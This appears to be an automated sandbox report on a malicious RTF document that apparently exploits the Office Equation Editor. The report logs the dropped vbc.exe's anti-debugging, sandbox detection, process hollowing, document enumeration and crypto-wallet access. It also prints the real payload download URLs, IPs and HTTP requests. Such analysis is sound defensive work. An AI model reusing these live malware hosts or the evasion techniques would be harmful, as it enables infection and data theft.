Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000003.00000002.2103520045.0000000000270000.00000040.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
Source: vbc.exe, 00000003.00000002.2103520045.0000000000270000.00000040.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 3_2_00270456 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1976	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2788	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2824	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: vbc.exe, 00000003.00000002.2103520045.0000000000270000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
Source: vbc.exe, 00000003.00000002.2103520045.0000000000270000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger

Source: C:\Users\Public\vbc.exe

Code function: 3_2_00270456 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000

Hides threads from debuggers

Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread information set: HideFromDebugger	Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 3_2_00270456 rdtsc

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 3_2_002733C6 LdrInitializeThunk,

3_2_002733C6

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 3_2_00275E3C mov eax, dword ptr fs:[00000030h]	3_2_00275E3C
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0027201E mov eax, dword ptr fs:[00000030h]	3_2_0027201E
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00271842 mov eax, dword ptr fs:[00000030h]	3_2_00271842
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00272050 mov eax, dword ptr fs:[00000030h]	3_2_00272050
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00275E50 mov eax, dword ptr fs:[00000030h]	3_2_00275E50
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0027505E mov eax, dword ptr fs:[00000030h]	3_2_0027505E
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00275571 mov eax, dword ptr fs:[00000030h]	3_2_00275571
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00272DAF mov eax, dword ptr fs:[00000030h]	3_2_00272DAF
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00271DAE mov eax, dword ptr fs:[00000030h]	3_2_00271DAE
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00271DAC mov eax, dword ptr fs:[00000030h]	3_2_00271DAC

HIPS / PFW / Operating System Protection Evasion:

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base address: 400000			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base address: 400000			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Jump to behavior

Source: recommended.4NN.4.dr	Binary or memory string: [9:53:53 AM]<<Program Manager>>
Source: recommended.4NN.4.dr	Binary or memory string: [9:54:03 AM]<<Program Manager>>

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files.zip VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files.zip VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files.zip VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\BPMLNOBVSB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\BPMLNOBVSB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\CURQNKVOIX.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\CURQNKVOIX.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\DVWHKMNFNN.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\DVWHKMNFNN.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\JSDNGYCOWY.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\JSDNGYCOWY.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\JSDNGYCOWY.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\JSDNGYCOWY.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\LTKMYBSEYZ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\LTKMYBSEYZ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\NIKHQAIQAU.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\NIKHQAIQAU.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\NWTVCDUMOB.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\NWTVCDUMOB.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\NWTVCDUMOB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\NWTVCDUMOB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\WUTJSCBCFX.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\WUTJSCBCFX.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\YPSIACHYXW.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\YPSIACHYXW.docx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\YPSIACHYXW.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\user\Files\YPSIACHYXW.xlsx VolumeInformation	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to steal Crypto Currency Wallets

Source: C:\Users\Public\vbc.exe

File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

Searches for user specific document files

Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\Public\vbc.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
144.168.239.55	unknown	Canada		36352	AS-COLOCROSSINGUS	true
213.239.204.60	unknown	Germany		24940	HETZNER-ASDE	false

Contacted Domains

Name	IP	Active
aap-ef.com	213.239.204.60	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://aap-ef.com/img/Breitburn_New_HTRJPFgzJ99.bin	false	Avira URL Cloud: safe	unknown
http://144.168.239.55/win/Apocalypst.exe	true	Avira URL Cloud: safe	unknown

AV Detection:

Multi AV Scanner detection for submitted file

Source: 8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf

ReversingLabs: Detection: 41%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Office Equation Editor has been started

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: aap-ef.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 213.239.204.60:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 144.168.239.55:80

Networking:

Downloads executable code via HTTP

Source: global traffic

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /win/Apocalypst.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 144.168.239.55Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/Breitburn_New_HTRJPFgzJ99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aap-ef.comCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16BAD8F7-5649-4CA3-B477-D1894D362AA0}.tmp

Source: global traffic	HTTP traffic detected: GET /win/Apocalypst.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 144.168.239.55Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/Breitburn_New_HTRJPFgzJ99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aap-ef.comCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: aap-ef.com

Source: vbc.exe, 00000004.00000003.2106991455.000000000084A000.00000004.00000001.sdmp	String found in binary or memory: http://aap-ef.com/img/Breitburn_New_HTRJPFgzJ99.bin
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: 77EC63BDA74BD0D0E0426DC8F8008506.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.2111772656.000000001ED42000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com0
